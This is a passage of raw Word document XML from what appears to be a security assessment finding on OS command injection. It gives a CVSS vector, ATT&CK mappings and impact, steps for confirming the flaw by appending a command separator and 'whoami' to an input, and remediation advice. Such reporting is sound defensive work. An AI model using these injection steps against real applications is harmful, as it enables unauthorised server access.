                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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5989AB92" w14:textId="4F1B7B9E">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76FF65F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EEC32C" w14:textId="3A85E16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DFC115D" w14:textId="6493390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613688A"/>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FD95160"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0CC3D5F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6795A7" w14:textId="3E2B597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7B0BA37" w:rsidP="0D325B6E" w:rsidRDefault="07B0BA37" w14:paraId="71790302" w14:textId="52988E8E">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N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R0afb44f414934df1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT:N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PR:N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UI:N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VC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="07B0BA37">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208ACC62">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E46DA0" w14:textId="11952ED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FF6F2F9" w14:textId="01E570C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E4FF6E3" w:rsidP="0D325B6E" w:rsidRDefault="5E4FF6E3" w14:paraId="5294F06E" w14:textId="0DBE5B99">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R8c359b2b8b2e4121">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5E4FF6E3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="5E4FF6E3" w:rsidP="0D325B6E" w:rsidRDefault="5E4FF6E3" w14:paraId="7838BE11" w14:textId="052ED169">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3983786a0c3645fe">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5E4FF6E3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1203: Exploitation for Client Execution</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7FF0F215">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83952E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2EF9AE4" w14:textId="294D9911">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C85C954" w:rsidP="0D325B6E" w:rsidRDefault="2C85C954" w14:paraId="32910E0E" w14:textId="65978481">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c489a7de7f2a42c2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2C85C954">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">M1038: </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="361831EB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Execution Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="5D9BC235" w:rsidP="0D325B6E" w:rsidRDefault="5D9BC235" w14:paraId="4383DF5D" w14:textId="2A3EDC20">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R19618db6ebfd4b44">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5D9BC235">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1AA7E54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D2EB722" w14:textId="41D0044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A3F2B95" w14:textId="2E6A34ED">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2B47C855" w14:textId="139EB0B2"/>
    <w:p w:rsidR="1CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="48F977C7" w14:textId="054DEF73">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F5FC0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F67D836" w:rsidP="0D325B6E" w:rsidRDefault="2F67D836" w14:paraId="66F848EA" w14:textId="5A79B68E">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67D836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command injection allows an attacker to execute arbitrary operating system (OS) commands on the system running the application. Thi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="059CFD53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s occurs when the application uses user-supplied data in a command that is then executed by the system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3EF2E3FD" w14:textId="62D2BA5E">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CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="66558F3E" w14:textId="44676E63">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CF5FC0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C394325" w:rsidP="0D325B6E" w:rsidRDefault="4C394325" w14:paraId="31F0113D" w14:textId="7A327EA1">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C394325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A successful command injection attacker could lead to a compromise of the server hosting the application. They could view, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C394325">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4C394325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and steal sensitive information </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E05E43F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C394325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on the server</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2080EB44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the server to move laterally across the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="441883C7" w14:textId="041F7554">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CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="659C5FAF" w14:textId="43A45DF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F5FC0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AFF956C" w:rsidP="0D325B6E" w:rsidRDefault="5AFF956C" w14:paraId="131CE263" w14:textId="3424090F">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AFF956C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AFF956C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AFF956C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identify</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AFF956C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the application feature </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AFF956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AFF956C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that passes user input to a system command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166060B9" w:rsidP="0D325B6E" w:rsidRDefault="166060B9" w14:paraId="24BA3862" w14:textId="0B2AEA2B">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Step 2: In the input, enter a valid value followed by a command </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separator</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66060B9">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166060B9" w:rsidP="0D325B6E" w:rsidRDefault="166060B9" w14:paraId="53E35DB2" w14:textId="38094B9F">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p 3: Append the OS command </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="166060B9">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0D325B6E" w:rsidR="166060B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="166060B9">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 after the </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separator</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submit</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 the input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166060B9" w:rsidP="0D325B6E" w:rsidRDefault="166060B9" w14:paraId="1351055C" w14:textId="48639704">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Step 4: View the output </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="166060B9">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166060B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will confirm the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07A3CC73" w14:textId="70D2025D">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CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="376AEF36" w14:textId="5BE2CCD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F5FC0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CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="3A1AE3C8" w14:textId="70E94DA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F5FC0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CF5FC0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A89B640" w:rsidP="0D325B6E" w:rsidRDefault="5A89B640" w14:paraId="74959E4E" w14:textId="5BDD68DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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A89B640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid OS </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C313D13">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5A89B640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ommand </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AFA02D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">execution </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and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73F3489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 xml:space="preserve">refactor the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4B1CA6F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">server </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co</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de to use APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="085BEA13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as calling </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="300DE945">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085BEA13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary directly</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 xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CA28589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>running shell code</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="785C3C56" w:rsidP="0D325B6E" w:rsidRDefault="785C3C56" w14:paraId="57F97F51" w14:textId="797E68F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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 xml:space="preserve">If calling OS commands is unavoidable, use a whitelist of approved characters </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="113D30B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
